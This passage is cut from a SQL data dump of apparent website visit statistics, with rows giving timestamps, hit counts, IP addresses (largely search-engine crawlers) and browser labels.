1496975814,1,0,1,0,'66.249.76.91',''),(119747,1496975987,1,0,1,0,'66.249.76.107',''),(119748,1496976118,1,0,1,0,'66.249.76.89',''),(119749,1496976271,1,1,0,0,'164.132.161.78','other'),(119750,1496976277,1,1,0,0,'51.255.65.32','other'),(119751,1496976477,1,1,0,0,'217.182.132.18','other'),(119752,1496976590,1,1,0,0,'109.236.91.29','chrome'),(119753,1496976594,1,0,1,0,'66.249.76.108',''),(119754,1496976997,1,1,0,0,'51.255.65.56','other'),(119755,1496977335,1,0,1,0,'66.249.76.93',''),(119756,1496977384,1,1,0,0,'217.182.132.78','other'),(119757,1496978394,1,1,0,0,'109.236.91.29','chrome'),(119758,1496979098,1,1,0,0,'164.132.161.86','other'),(119759,1496979207,2,1,1,0,'66.249.76.93',''),(119760,1496979271,1,0,1,0,'66.249.76.89',''),(119761,1496979478,1,1,0,0,'51.255.65.26','other'),(119762,1496979521,1,1,0,0,'51.255.65.47','other'),(119763,1496979710,1,1,0,0,'151.80.27.118','other'),(119764,1496979831,1,1,0,0,'164.132.161.95','other'),(119765,1496980190,1,1,0,0,'109.236.91.29','chrome'),(119766,1496980366,1,1,0,0,'164.132.161.78','other'),(119767,1496981015,1,1,0,0,'137.74.207.159','other'),(119768,1496981095,1,1,0,0,'109.236.91.29','chrome'),(119769,1496981589,1,1,0,0,'51.255.65.80','other'),(119770,1496981879,1,1,0,0,'207.46.13.112','other'),(119771,1496982383,1,1,0,0,'137.74.207.110','other'),(119772,1496982496,1,1,0,0,'141.8.183.1','other'),(119773,1496982531,1,1,0,0,'164.132.161.16','other'),(119774,1496982610,1,0,1,0,'66.249.66.156',''),(119775,1496982832,1,0,1,0,'66.249.76.91',''),(119776,1496982893,1,1,0,0,'109.236.91.29','chrome'),(119777,1496983045,1,1,0,0,'217.182.132.37','other'),(119778,1496983067,1,1,0,0,'63.243.252.4','other'),(119779,1496983403,1,1,0,0,'164.132.161.43','other'),(119780,1496983733,1,0,1,0,'66.249.66.157',''),(119781,1496983769,1,1,0,0,'91.196.178.67','firefox'),(119782,1496983870,1,1,0,0,'51.255.65.56','other'),(119783,1496983876,1,1,0,0,'164.132.161.50','other'),(119784,1496984212,1,1,0,0,'51.255.71.117','other'),(119785,1496984636,1,1,0,0,'217.182.132.84','other'),(119786,1496984691,1,1,0,0,'109.236.91.29','chrome'),(119787,1496985066,1,1,0,0,'164.132.161.33','other'),(119788,1496985398,1,1,0,0,'8.29.198.25','other'),(119789,1496985734,1,1,0,0,'51.255.65.70','other'),(119790,1496985964,1,1,0,0,'51.255.65.49','other'),(119791,1496986802,1,1,0,0,'91.209.11.236','other'),(119792,1496987209,2,1,1,0,'66.249.76.91',''),(119793,1496987634,1,0,1,0,'66.249.76.108',''),(119794,1496987681,1,1,0,0,'91.196.178.67','chrome'),(119795,1496987832,1,1,0,0,'217.182.132.96','other'),(119796,1496988014,1,1,0,0,'217.182.132.66','other'),(119797,1496988109,1,1,0,0,'51.255.65.53','other'),(119798,1496988272,1,1,0,0,'217.182.132.83','other'),(119799,1496988484,1,1,0,0,'164.132.161.58','other'),(119800,1496989077,1,1,0,0,'51.255.71.125','other'),(119801,1496989344,1,1,0,0,'137.74.201.100','other'),(119802,1496989549,1,1,0,0,'217.182.132.152','other'),(119803,1496989575,1,1,0,0,'51.255.65.76','other'),(119804,1496989671,1,1,0,0,'141.8.183.1','other'),(119805,1496989973,1,1,0,0,'195.49.151.89','chrome'),(119806,1496989994,1,1,0,0,'87.250.224.7','other'),(119807,1496990130,1,1,0,0,'91.196.178.71','chrome'),(119808,1496990270,1,1,0,0,'217.182.132.146','other'),(119809,1496990382,1,1,0,0,'51.255.71.123','other'),(119810,1496990915,2,1,1,0,'66.249.76.108',''),(119811,1496991092,1,0,1,0,'66.249.76.91',''),(119812,1496991596,1,1,0,0,'164.132.161.25','other'),(119813,1496991735,1,1,0,0,'217.182.132.64','other'),(119814,1496991928,1,0,1,0,'66.249.76.109',''),(119815,1496991933,1,1,0,0,'51.255.65.93','other'),(119816,1496992044,1,0,1,0,'66.249.76.108',''),(119817,1496992113,1,1,0,0,'51.255.65.74','other'),(119818,1496992463,1,1,0,0,'51.255.71.125','other'),(119819,1496992682,1,1,0,0,'51.255.71.129','other'),(119820,1496992795,1,1,0,0,'217.182.132.67','other'),(119821,1496993031,1,1,0,0,'51.255.65.93','other'),(119822,1496993444,1,1,0,0,'217.182.132.84','other'),(119823,1496993493,1,0,1,0,'66.249.66.195',''),(119824,1496993707,1,1,0,0,'217.182.132.170','other'),(119825,1496993847,1,1,0,0,'37.52.179.235','chrome'),(119826,1496993998,1,1,0,0,'217.182.132.56','other'),(119827,1496994118,1,1,0,0,'217.182.132.76','other'),(119828,1496994592,1,1,0,0,'51.255.65.86','other'),(119829,1496994763,1,0,1,0,'66.249.76.93',''),(119830,1496994809,6,6,0,0,'144.76.12.99','other'),(119831,1496995015,1,0,1,0,'66.249.66.156',''),(119832,1496995390,2,2,0,0,'130.180.209.248','chrome'),(119833,1496995699,1,1,0,0,'109.236.81.160','chrome'),(119834,1496996235,1,1,0,0,'217.182.132.86','other'),(119835,1496996236,1,1,0,0,'8.29.198.25','other'),(119836,1496996345,1,0,1,0,'66.249.76.108',''),(119837,1496996534,1,1,0,0,'51.255.65.54','other'),(119838,1496996736,1,1,0,0,'37.54.17.119','chrome'),(119839,1496997022,1,0,1,0,'66.249.76.109',''),(119840,1496997033,1,1,0,0,'5.255.253.63','other'),(119841,1496997499,1,1,0,0,'109.236.81.160','chrome'),(119842,1496997746,1,1,0,0,'217.182.132.86','other'),(119843,1496997866,1,1,0,0,'217.69.133.4','other'),(119844,1496998428,1,1,0,0,'137.74.207.110','other'),(119845,1496998758,1,1,0,0,'165.227.68.81','other'),(119846,1496998801,1,1,0,0,'51.255.71.126','other'),(119847,1496998948,1,0,1,0,'68.180.230.48',''),(119848,1496998993,1,1,0,0,'51.255.65.39','other'),(119849,1496999308,1,1,0,0,'109.236.81.160','chrome'),(119850,1496999870,1,0,1,0,'66.249.66.156',''),(119851,1496999892,1,0,1,0,'66.249.76.89',''),(119852,1497000015,2,0,2,0,'66.249.76.93',''),(119853,1497000021,1,1,0,0,'51.255.65.72','other'),(119854,1497000056,1,1,0,0,'207.46.13.112','other'),(119855,1497000314,1,1,0,0,'216.244.66.237','other'),(119856,1497001099,1,1,0,0,'109.236.81.160','chrome'),(119857,1497001275,1,1,0,0,'164.132.161.42','other'),(119858,1497001505,1,1,0,0,'51.255.65.26','other'),(119859,1497001645,1,0,1,0,'66.249.76.91',''),(119860,1497002117,1,1,0,0,'51.255.65.68','other'),(119861,1497002151,1,1,0,0,'164.132.161.8','other'),(119862,1497002223,1,1,0,0,'91.196.178.69','chrome'),(119863,1497002899,1,1,0,0,'109.236.81.160','chrome'),(119864,1497003013,1,1,0,0,'51.255.65.16','other'),(119865,1497003372,1,1,0,0,'164.132.161.6','other'),(119866,1497003597,1,1,0,0,'164.132.161.26','other'),(119867,1497003791,2,2,0,0,'95.132.64.202','chrome'),(119868,1497003852,1,1,0,0,'137.74.207.120','other'),(119869,1497004018,1,1,0,0,'216.244.66.237','other'),(119870,1497004087,1,1,0,0,'180.76.15.162','other'),(119871,1497004450,1,1,0,0,'51.255.65.87','other'),(119872,1497004549,1,1,0,0,'51.255.71.133','other'),(119873,1497004560,1,1,0,0,'51.255.65.80','other'),(119874,1497004631,1,1,0,0,'51.255.65.51','other'),(119875,1497004699,1,1,0,0,'109.236.81.160','chrome'),(119876,1497004715,1,1,0,0,'130.180.217.42','chrome'),(119877,1497004951,1,1,0,0,'51.255.65.62','other'),(119878,1497005566,23,23,0,0,'136.243.152.18','other'),(119879,1497005609,1,1,0,0,'130.180.212.69','chrome'),(119880,1497005750,1,1,0,0,'51.255.65.13','other'),(119881,1497006079,1,1,0,0,'94.178.151.170','firefox'),(119882,1497006270,1,1,0,0,'188.163.84.158','chrome'),(119883,1497006499,1,1,0,0,'109.236.81.160','chrome'),(119884,1497006548,1,1,0,0,'51.255.65.69','other'),(119885,1497006785,1,1,0,0,'188.166.121.88','firefox'),(119886,1497006876,1,1,0,0,'216.244.66.237','other'),(119887,1497006936,1,1,0,0,'51.255.65.58','other'),(119888,1497007036,1,1,0,0,'164.132.161.78','other'),(119889,1497007066,1,1,0,0,'66.249.76.109','chrome'),(119890,1497007078,1,1,0,0,'8.29.198.27','other'),(119891,1497007086,1,1,0,0,'164.132.161.2','other'),(119892,1497007523,1,1,0,0,'51.255.65.70','other'),(119893,1497007707,1,1,0,0,'91.196.177.26','chrome'),(119894,1497007913,1,1,0,0,'51.255.65.40','other'),(119895,1497008009,1,1,0,0,'207.46.13.112','other'),(119896,1497008095,1,1,0,0,'217.182.132.151','other'),(119897,1497008108,1,0,1,0,'66.249.66.195',''),(119898,1497008300,1,1,0,0,'109.236.81.160','chrome'),(119899,1497008302,2,0,2,0,'68.180.230.48',''),(119900,1497008675,1,1,0,0,'217.182.132.240','other'),(119901,1497008756,1,1,0,0,'78.111.190.171','firefox'),(119902,1497008795,1,0,1,0,'66.249.76.89',''),(119903,1497008839,1,1,0,0,'91.196.178.69','chrome'),(119904,1497008897,1,0,1,0,'66.249.66.158',''),(119905,1497008905,1,0,1,0,'66.249.66.201',''),(119906,1497008924,1,1,0,0,'94.45.133.84','chrome'),(119907,1497008939,1,1,0,0,'188.163.84.158','chrome'),(119908,1497008942,1,1,0,0,'66.249.66.157','chrome'),(119909,1497009008,1,1,0,0,'217.69.133.9','other'),(119910,1497009401,1,1,0,0,'217.182.132.81','other'),(119911,1497009438,1,0,1,0,'66.249.76.108',''),(119912,1497009654,1,1,0,0,'164.132.161.45','other'),(119913,1497009715,1,1,0,0,'51.255.65.14','other'),(119914,1497009851,1,1,0,0,'51.255.65.61','other'),(119915,1497009889,1,1,0,0,'51.255.65.70','other'),(119916,1497010100,1,1,0,0,'109.236.81.160','chrome'),(119917,1497010515,1,1,0,0,'51.255.71.98','other'),(119918,1497010754,1,1,0,0,'217.182.132.23','other'),(119919,1497010765,1,1,0,0,'51.255.65.77','other'),(119920,1497010810,1,0,1,0,'68.180.230.48',''),(119921,1497011294,1,1,0,0,'91.196.179.138','firefox'),(119922,1497011322,1,1,0,0,'217.182.132.91','other'),(119923,1497011347,1,0,1,0,'66.249.76.89',''),(119924,1497011391,1,0,1,0,'66.249.76.91',''),(119925,1497011493,1,1,0,0,'217.182.132.63','other'),(119926,1497011692,1,0,1,0,'66.249.66.195',''),(119927,1497011893,1,1,0,0,'217.182.132.83','other'),(119928,1497011899,1,1,0,0,'109.236.81.160','chrome'),(119929,1497011969,1,1,0,0,'62.212.73.211','other'),(119930,1497012148,1,1,0,0,'217.182.132.181','other'),(119931,1497012176,1,1,0,0,'207.46.13.112','other'),(119932,1497012419,1,1,0,0,'164.132.161.65','other'),(119933,1497012668,1,0,1,0,'66.249.76.107',''),(119934,1497012773,1,1,0,0,'164.132.161.54','other'),(119935,1497012822,1,1,0,0,'217.182.132.170','other'),(119936,1497013009,1,1,0,0,'217.182.132.57','other'),(119937,1497013107,1,1,0,0,'217.182.132.149','other'),(119938,1497013320,1,1,0,0,'217.69.133.67','other'),(119939,1497013531,1,0,1,0,'66.249.76.89',''),(119940,1497013699,1,1,0,0,'109.236.81.160','chrome'),(119941,1497014088,1,0,1,0,'66.249.76.109',''),(119942,1497014146,1,0,1,0,'66.249.76.108',''),(119943,1497014291,1,1,0,0,'217.182.132.90','other'),(119944,1497014319,1,0,1,0,'66.249.76.107',''),(119945,1497014705,1,1,0,0,'51.255.65.45','other'),(119946,1497014935,1,1,0,0,'164.132.161.52','other'),(119947,1497015213,1,1,0,0,'51.255.65.41','other'),(119948,1497015499,1,1,0,0,'109.236.81.160','chrome'),(119949,1497015648,2,0,2,0,'66.249.76.107',''),(119950,1497016065,1,1,0,0,'137.74.207.161','other'),(119951,1497016133,1,1,0,0,'46.48.13.161','chrome'),(119952,1497016427,1,0,1,0,'66.249.66.156',''),(119953,1497016588,1,1,0,0,'66.249.76.108','chrome'),(119954,1497016612,1,1,0,0,'164.132.162.187','other'),(119955,1497017299,1,1,0,0,'109.236.90.92','chrome'),(119956,1497017389,1,1,0,0,'217.182.132.173','other'),(119957,1497017770,1,1,0,0,'164.132.161.94','other'),(119958,1497017919,1,1,0,0,'8.29.198.26','other'),(119959,1497018361,1,1,0,0,'51.255.71.98','other'),(119960,1497018453,1,1,0,0,'51.255.65.94','other'),(119961,1497018454,1,0,1,0,'66.249.76.91',''),(119962,1497018458,1,1,0,0,'66.249.66.156','chrome'),(119963,1497018699,1,1,0,0,'51.255.71.115','other'),(119964,1497018882,1,0,1,0,'66.249.76.89',''),(119965,1497019099,1,1,0,0,'109.236.81.160','chrome'),(119966,1497019313,1,1,0,0,'137.74.207.114','other'),(119967,1497019460,1,1,0,0,'180.76.15.157','other'),(119968,1497020102,1,1,0,0,'51.255.65.32','other'),(119969,1497020132,1,1,0,0,'51.255.65.37','other'),(119970,1497020448,2,0,2,0,'66.249.76.108',''),(119971,1497020492,1,1,0,0,'217.69.133.9','other'),(119972,1497020901,1,1,0,0,'109.236.81.160','chrome'),(119973,1497020977,1,1,0,0,'51.255.65.33','other'),(119974,1497020983,1,1,0,0,'217.69.133.2','other'),(119975,1497021208,1,1,0,0,'164.132.161.40','other'),(119976,1497021229,1,1,0,0,'217.182.132.181','other'),(119977,1497021359,1,0,1,0,'66.249.76.91',''),(119978,1497021380,1,0,1,0,'66.249.76.107',''),(119979,1497021705,1,1,0,0,'164.132.161.55','other'),(119980,1497021734,1,1,0,0,'164.132.161.39','other'),(119981,1497021943,2,0,2,0,'66.249.66.156',''),(119982,1497022008,2,2,0,0,'91.209.11.236','other'),(119983,1497022274,1,1,0,0,'51.255.71.120','other'),(119984,1497022296,1,1,0,0,'164.132.161.70','other'),(119985,1497022700,1,1,0,0,'109.236.81.160','chrome'),(119986,1497022808,1,1,0,0,'51.255.65.11','other'),(119987,1497023064,1,0,1,0,'66.249.76.91',''),(119988,1497023120,1,0,1,0,'66.249.76.93',''),(119989,1497023274,1,1,0,0,'164.132.161.56','other'),(119990,1497023628,1,0,1,0,'68.180.230.48',''),(119991,1497023897,1,0,1,0,'66.249.76.89',''),(119992,1497023908,1,1,0,0,'40.77.167.126','other'),(119993,1497024171,1,1,0,0,'217.182.132.187','other'),(119994,1497024326,1,1,0,0,'164.132.161.5','other'),(119995,1497024541,1,1,0,0,'109.236.91.39','chrome'),(119996,1497024573,1,1,0,0,'51.255.65.16','other'),(119997,1497024588,1,1,0,0,'217.182.132.85','other'),(119998,1497024711,1,1,0,0,'51.255.65.43','other'),(119999,1497024926,1,1,0,0,'40.77.167.126','other'),(120000,1497024953,1,0,1,0,'66.249.76.109',''),(120001,1497025668,1,1,0,0,'51.255.65.97','other'),(120002,1497025734,1,1,0,0,'217.182.132.62','other'),(120003,1497026084,1,1,0,0,'51.255.65.41','other'),(120004,1497026221,1,1,0,0,'51.255.71.114','other'),(120005,1497026299,1,1,0,0,'109.236.81.160','chrome'),(120006,1497026471,1,0,1,0,'68.180.230.48',''),(120007,1497026994,1,1,0,0,'164.132.161.57','other'),(120008,1497027491,1,1,0,0,'207.46.13.112','other'),(120009,1497028167,1,1,0,0,'51.255.65.18','other'),(120010,1497028262,1,1,0,0,'217.182.132.64','other'),(120011,1497028327,1,1,0,0,'109.236.81.160','chrome'),(120012,1497028681,1,0,1,0,'68.180.230.48',''),(120013,1497028753,1,1,0,0,'8.29.198.26','other'),(120014,1497029641,1,1,0,0,'51.255.65.71','other'),(120015,1497029874,2,2,0,0,'137.74.201.108','other'),(120016,1497029899,1,1,0,0,'109.236.81.160','chrome'),(120017,1497030023,1,1,0,0,'217.182.132.72','other'),(120018,1497030036,2,1,1,0,'66.249.76.93',''),(120019,1497030042,1,0,1,0,'66.249.66.158',''),(120020,1497030110,1,0,1,0,'66.249.76.89',''),(120021,1497030489,1,1,0,0,'91.209.11.236','other'),(120022,1497030674,1,1,0,0,'91.196.178.163','chrome'),(120023,1497030728,1,1,0,0,'51.255.65.86','other'),(120024,1497030888,2,0,2,0,'68.180.230.48',''),(120025,1497031411,1,1,0,0,'51.255.65.20','other'),(120026,1497031442,1,1,0,0,'217.182.132.72','other'),(120027,1497031644,1,1,0,0,'164.132.161.8','other'),(120028,1497031702,1,1,0,0,'109.236.81.160','chrome'),(120029,1497031799,1,0,1,0,'66.249.76.108',''),(120030,1497032125,1,1,0,0,'164.132.161.4','other'),(120031,1497032172,1,1,0,0,'51.255.71.115','other'),(120032,1497032417,1,0,1,0,'66.249.76.93',''),(120033,1497032454,2,2,0,0,'216.244.66.237','other'),(120034,1497032784,1,0,1,0,'66.249.66.158',''),(120035,1497033390,1,1,0,0,'217.182.132.18','other'),(120036,1497033501,1,1,0,0,'109.236.81.160','chrome'),(120037,1497034138,1,1,0,0,'164.132.161.80','other'),(120038,1497034500,1,1,0,0,'217.182.132.74','other'),(120039,1497035300,1,1,0,0,'109.236.81.160','chrome'),(120040,1497035323,1,1,0,0,'164.132.161.31','other'),(120041,1497036044,1,1,0,0,'51.255.65.43','other'),(120042,1497036064,1,0,1,0,'66.249.76.93',''),(120043,1497036210,1,0,1,0,'66.249.76.89',''),(120044,1497036365,1,1,0,0,'164.132.161.37','other'),(120045,1497036975,1,0,1,0,'66.249.76.107',''),(120046,1497037037,1,1,0,0,'164.132.161.45','other'),(120047,1497037100,1,1,0,0,'109.236.81.160','chrome'),(120048,1497037528,1,1,0,0,'217.69.133.9','other'),(120049,1497038124,1,1,0,0,'217.182.132.67','other'),(120050,1497038901,1,1,0,0,'109.236.81.160','chrome'),(120051,1497039089,1,1,0,0,'217.182.132.156','other'),(120052,1497039591,1,1,0,0,'8.29.198.26','other'),(120053,1497039748,1,1,0,0,'217.182.132.23','other'),(120054,1497039977,1,1,0,0,'51.255.65.89','other'),(120055,1497040462,1,0,1,0,'66.249.76.109',''),(120056,1497040700,1,1,0,0,'109.236.81.160','chrome'),(120057,1497040743,1,1,0,0,'164.132.161.26','other'),(120058,1497040773,1,1,0,0,'63.243.252.110','other'),(120059,1497041308,1,1,0,0,'51.255.65.4','other'),(120060,1497041448,1,1,0,0,'164.132.161.18','other'),(120061,1497041726,1,1,0,0,'178.154.200.37','other'),(120062,1497041854,1,1,0,0,'51.255.65.33','other'),(120063,1497041862,1,1,0,0,'164.132.161.67','other'),(120064,1497042242,1,0,1,0,'66.249.76.107',''),(120065,1497042500,1,1,0,0,'109.236.81.160','chrome'),(120066,1497042611,1,1,0,0,'51.255.65.54','other'),(120067,1497043079,1,1,0,0,'217.182.132.7','other'),(120068,1497043183,1,1,0,0,'51.255.65.82','other'),(120069,1497043745,1,1,0,0,'217.69.133.4','other'),(120070,1497043761,1,1,0,0,'217.69.133.5','other'),(120071,1497043940,1,1,0,0,'164.132.161.18','other'),(120072,1497044302,1,1,0,0,'109.236.81.160','chrome'),(120073,1497044419,1,1,0,0,'217.182.132.170','other'),(120074,1497044930,1,1,0,0,'217.182.132.95','other'),(120075,1497045043,1,1,0,0,'164.132.161.86','other'),(120076,1497045079,1,1,0,0,'66.249.76.93','chrome'),(120077,1497045099,1,1,0,0,'164.132.161.56','other'),(120078,1497045258,1,1,0,0,'51.255.65.35','other'),(120079,1497045827,2,2,0,0,'91.209.11.236','other'),(120080,1497046100,1,1,0,0,'109.236.81.160','chrome'),(120081,1497046600,1,0,1,0,'66.249.76.93',''),(120082,1497046849,1,0,1,0,'66.249.66.157',''),(120083,1497046858,1,0,1,0,'66.249.66.199',''),(120084,1497046994,1,1,0,0,'216.244.66.237','other'),(120085,1497047163,1,1,0,0,'51.255.71.98','other'),(120086,1497047768,1,1,0,0,'217.182.132.19','other'),(120087,1497047903,1,1,0,0,'109.236.81.160','chrome'),(120088,1497048265,1,1,0,0,'217.182.132.147','other'),(120089,1497048436,1,1,0,0,'164.132.161.73','other'),(120090,1497048514,1,1,0,0,'217.182.132.76','other'),(120091,1497048606,1,1,0,0,'91.209.11.236','other'),(120092,1497048989,1,1,0,0,'217.69.133.203','other'),(120093,1497049700,1,1,0,0,'109.236.81.160','chrome'),(120094,1497049848,1,1,0,0,'51.255.71.128','other'),(120095,1497050170,1,1,0,0,'51.255.65.88','other'),(120096,1497050429,1,1,0,0,'8.29.198.25','other'),(120097,1497050516,1,1,0,0,'216.244.66.237','other'),(120098,1497050527,1,0,1,0,'66.249.66.157',''),(120099,1497050725,1,1,0,0,'137.74.201.108','other'),(120100,1497050978,1,1,0,0,'51.255.65.60','other'),(120101,1497051120,1,1,0,0,'91.121.86.136','other'),(120102,1497051503,1,1,0,0,'109.236.81.160','chrome'),(120103,1497051585,1,1,0,0,'91.209.11.236','other'),(120104,1497052285,1,1,0,0,'51.255.65.81','other'),(120105,1497052308,1,1,0,0,'216.244.66.237','other'),(120106,1497052324,1,1,0,0,'51.255.65.73','other'),(120107,1497052572,1,1,0,0,'51.255.71.126','other'),(120108,1497053065,1,1,0,0,'164.132.161.77','other'),(120109,1497053301,1,1,0,0,'109.236.81.160','chrome'),(120110,1497053590,1,1,0,0,'217.182.132.81','other'),(120111,1497053945,1,1,0,0,'217.182.132.94','other'),(120112,1497054265,1,1,0,0,'95.108.179.8','other'),(120113,1497055040,1,1,0,0,'51.255.65.56','other'),(120114,1497055085,1,1,0,0,'217.69.133.5','other'),(120115,1497055100,1,1,0,0,'109.236.81.160','chrome'),(120116,1497055225,1,1,0,0,'157.55.39.67','other'),(120117,1497055345,1,1,0,0,'164.132.161.59','other'),(120118,1497055517,1,1,0,0,'51.255.71.131','other'),(120119,1497055616,1,0,1,0,'66.249.76.91',''),(120120,1497055797,1,1,0,0,'164.132.161.27','other'),(120121,1497056425,1,1,0,0,'164.132.161.14','other'),(120122,1497056461,1,1,0,0,'180.76.15.138','other'),(120123,1497056646,1,1,0,0,'164.132.161.29','other'),(120124,1497056900,1,1,0,0,'109.236.81.160','chrome'),(120125,1497057594,1,0,1,0,'66.249.76.109',''),(120126,1497057800,1,1,0,0,'164.132.162.153','other'),(120127,1497058054,1,1,0,0,'164.132.161.56','other'),(120128,1497058431,1,1,0,0,'217.182.132.86','other'),(120129,1497058700,1,1,0,0,'109.236.81.160','chrome'),(120130,1497058936,1,1,0,0,'66.102.9.25','chrome'),(120131,1497059662,2,0,2,0,'66.249.76.93',''),(120132,1497060013,1,1,0,0,'51.255.65.85','other'),(120133,1497060204,2,2,0,0,'163.172.74.101','other'),(120134,1497060265,1,1,0,0,'164.132.161.53','other'),(120135,1497060501,1,1,0,0,'109.236.81.160','chrome'),(120136,1497060831,1,1,0,0,'217.69.133.3','other'),(120137,1497060900,1,1,0,0,'217.182.132.171','other'),(120138,1497061123,1,1,0,0,'91.209.11.236','other'),(120139,1497061266,1,1,0,0,'8.29.198.25','other'),(120140,1497062002,1,1,0,0,'51.255.65.2','other'),(120141,1497062005,1,1,0,0,'66.249.76.109','chrome'),(120142,1497062300,1,1,0,0,'109.236.81.160','chrome'),(120143,1497062316,1,1,0,0,'216.244.66.237','other'),(120144,1497062514,1,1,0,0,'217.182.132.180','other'),(120145,1497063370,1,1,0,0,'137.74.207.120','other'),(120146,1497063917,1,1,0,0,'51.255.65.20','other'),(120147,1497064100,1,1,0,0,'109.236.81.160','chrome'),(120148,1497064472,1,1,0,0,'51.255.65.53','other'),(120149,1497064564,1,1,0,0,'66.249.76.89','chrome'),(120150,1497064633,1,1,0,0,'66.249.76.93','chrome'),(120151,1497065005,1,1,0,0,'180.76.15.16','other'),(120152,1497065630,1,1,0,0,'164.132.161.71','other'),(120153,1497065661,1,1,0,0,'164.132.161.59','other'),(120154,1497065664,1,1,0,0,'141.8.132.25','other'),(120155,1497065900,1,1,0,0,'109.236.81.160','chrome'),(120156,1497065946,1,1,0,0,'46.48.13.161','chrome'),(120157,1497065956,1,1,0,0,'164.132.161.22','other'),(120158,1497066035,1,0,1,0,'66.249.76.89',''),(120159,1497066103,1,0,1,0,'66.249.76.107',''),(120160,1497066467,1,1,0,0,'217.182.132.176','other'),(120161,1497066740,1,0,1,0,'66.249.76.108',''),(120162,1497067043,1,1,0,0,'217.182.132.241','other'),(120163,1497067167,1,1,0,0,'51.255.65.29','other'),(120164,1497067248,1,1,0,0,'164.132.161.56','other'),(120165,1497067581,1,1,0,0,'2.92.211.209','msie'),(120166,1497067701,1,1,0,0,'109.236.81.160','chrome'),(120167,1497067809,1,1,0,0,'164.132.161.23','other'),(120168,1497068361,1,1,0,0,'216.244.66.237','other'),(120169,1497068488,1,0,1,0,'66.249.76.108',''),(120170,1497069321,1,1,0,0,'207.46.13.112','other'),(120171,1497069500,1,1,0,0,'109.236.81.160','chrome'),(120172,1497070531,2,0,2,0,'66.249.66.74',''),(120173,1497070718,1,1,0,0,'66.249.76.89','chrome'),(120174,1497070966,1,1,0,0,'66.249.76.109','chrome'),(120175,1497071300,2,2,0,0,'109.236.81.160','chrome'),(120176,1497071849,1,1,0,0,'178.92.170.114','chrome'),(120177,1497072046,1,0,1,0,'66.249.76.93',''),(120178,1497072090,1,1,0,0,'8.29.198.26','other'),(120179,1497072553,1,1,0,0,'66.249.76.109','chrome'),(120180,1497073515,1,0,1,0,'66.249.76.89',''),(120181,1497073873,1,1,0,0,'51.255.71.100','other'),(120182,1497074208,1,1,0,0,'164.132.161.67','other'),(120183,1497074249,1,1,0,0,'137.74.207.120','other'),(120184,1497074902,1,0,1,0,'66.249.76.91',''),(120185,1497075217,1,1,0,0,'217.182.132.190','other'),(120186,1497075625,2,0,2,0,'66.249.66.75',''),(120187,1497075647,1,0,1,0,'66.249.76.89',''),(120188,1497075654,1,0,1,0,'66.249.66.74',''),(120189,1497075945,1,1,0,0,'51.255.65.94','other'),(120190,1497076109,1,1,0,0,'137.74.201.99','other'),(120191,1497076309,1,1,0,0,'51.255.71.123','other'),(120192,1497076363,1,1,0,0,'51.255.65.74','other'),(120193,1497077053,1,1,0,0,'217.182.132.65','other'),(120194,1497077204,1,1,0,0,'164.132.161.20','other'),(120195,1497077655,1,1,0,0,'111.206.36.12','firefox'),(120196,1497077796,1,1,0,0,'164.132.162.153','other'),(120197,1497078191,1,1,0,0,'91.209.11.236','other'),(120198,1497078524,2,2,0,0,'91.196.178.37','chrome'),(120199,1497078811,1,1,0,0,'137.74.207.101','other'),(120200,1497079136,1,1,0,0,'51.255.71.131','other'),(120201,1497079265,1,1,0,0,'164.132.161.28','other'),(120202,1497079373,1,1,0,0,'164.132.161.41','other'),(120203,1497079433,1,1,0,0,'164.132.161.23','other'),(120204,1497079906,1,1,0,0,'216.244.66.237','other'),(120205,1497080098,1,1,0,0,'217.182.132.172','other'),(120206,1497080422,1,1,0,0,'164.132.161.38','other'),(120207,1497080427,1,1,0,0,'217.182.132.18','other'),(120208,1497080505,1,1,0,0,'51.255.65.70','other'),(120209,1497081164,1,1,0,0,'141.8.142.164','other'),(120210,1497081165,1,1,0,0,'5.255.253.63','other'),(120211,1497081369,1,1,0,0,'51.255.65.96','other'),(120212,1497081512,1,1,0,0,'66.249.76.89','chrome'),(120213,1497081709,2,2,0,0,'66.249.76.108','chrome'),(120214,1497082155,1,1,0,0,'51.255.65.15','other'),(120215,1497082169,1,0,1,0,'66.249.76.109',''),(120216,1497082188,1,1,0,0,'66.249.66.156','chrome'),(120217,1497082217,1,1,0,0,'66.249.76.109','chrome'),(120218,1497082510,1,0,1,0,'66.249.66.75',''),(120219,1497082524,1,1,0,0,'66.249.76.91','chrome'),(120220,1497082667,247,247,0,0,'163.172.74.103','other'),(120221,1497082918,1,1,0,0,'8.29.198.25','other'),(120222,1497083900,1,1,0,0,'217.182.132.95','other'),(120223,1497084684,1,1,0,0,'217.182.132.156','other'),(120224,1497084795,4,4,0,0,'91.209.11.236','other'),(120225,1497085189,1,1,0,0,'164.132.161.23','other'),(120226,1497085261,1,1,0,0,'66.249.76.91','chrome'),(120227,1497085770,1,1,0,0,'217.182.132.56','other'),(120228,1497085786,1,1,0,0,'164.132.161.65','other'),(120229,1497086094,2,2,0,0,'91.209.11.236','other'),(120230,1497086868,1,1,0,0,'217.182.132.68','other'),(120231,1497087017,1,1,0,0,'216.244.66.237','other'),(120232,1497087277,1,1,0,0,'91.209.11.236','other'),(120233,1497087493,1,1,0,0,'51.255.65.76','other'),(120234,1497087531,1,1,0,0,'164.132.162.158','other'),(120235,1497088572,1,1,0,0,'217.182.132.86','other'),(120236,1497088616,1,1,0,0,'66.249.66.156','chrome'),(120237,1497088833,1,1,0,0,'164.132.161.37','other'),(120238,1497088875,1,1,0,0,'217.69.133.2','other'),(120239,1497088893,1,1,0,0,'164.132.162.159','other'),(120240,1497089632,1,1,0,0,'164.132.161.96','other'),(120241,1497090154,1,0,1,0,'66.249.66.155',''),(120242,1497090640,1,1,0,0,'66.249.66.82','chrome'),(120243,1497090721,1,1,0,0,'164.132.161.84','other'),(120244,1497090815,1,1,0,0,'51.255.65.79','other'),(120245,1497091106,2,0,2,0,'66.249.76.93',''),(120246,1497091277,1,0,1,0,'66.249.76.107',''),(120247,1497091404,1,1,0,0,'51.255.65.14','other'),(120248,1497091432,1,1,0,0,'217.182.132.21','other'),(120249,1497091924,1,0,1,0,'66.249.66.76',''),(120250,1497093060,1,0,1,0,'66.249.76.91',''),(120251,1497093083,1,1,0,0,'51.255.65.53','other'),(120252,1497093391,1,1,0,0,'216.244.66.237','other'),(120254,1497093433,1,1,0,0,'164.132.161.87','other'),(120255,1497093755,1,1,0,0,'8.29.198.26','other'),(120256,1497094015,1,1,0,0,'164.132.161.44','other'),(120257,1497094361,1,1,0,0,'137.74.201.99','other'),(120258,1497094573,1,1,0,0,'51.255.65.97','other'),(120259,1497094603,1,1,0,0,'164.132.161.56','other'),(120260,1497095027,3,0,3,0,'66.249.76.109',''),(